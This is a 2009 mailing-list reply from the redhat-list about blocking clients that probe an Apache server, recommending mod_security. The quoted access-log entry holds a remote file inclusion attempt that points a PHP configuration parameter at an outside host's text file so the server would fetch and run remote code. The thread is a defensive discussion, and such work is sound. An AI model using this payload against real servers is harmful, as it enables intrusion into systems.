blocking ips with iptables accessing invalid URL

Manuel Aróstegui manuel at todo-linux.com
Wed Jul 8 08:33:28 UTC 2009


El mié, 08-07-2009 a las 10:26 +0200, Daniel Carrillo escribió:
> 2009/7/8 ESGLinux <esggrupos at gmail.com>:
> > Hi all,
> > I´m having a problem with an Apache web server.
> >
> > I get a lot of access ot this kind:
> >
> >
> > x.x.x.x - - [08/Jul/2009:09:42:20 +0200] "GET
> > //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://aboutav.com//id1.txt???
> > HTTP/1.1" 404 1015 "-" "Mozilla/5.0"
> >
> > where x.x.x.x is the ip of the client, I suposse this ip is trying to find a
> > security hole in my system, so what I do manually is this:
> 
> With Apache, a very useful tool to block this events is mod_security.

Agreed, but it won't block the IP but the GET.
But you're correct, mod_security is mandatory in any webserver facing
the internet :-)

Manuel.
-- 
Manuel Arostegui Ramirez.

Electronic Mail is not secure, might not be read every day, and should not
be used for urgent or sensitive issues.




More information about the redhat-list mailing list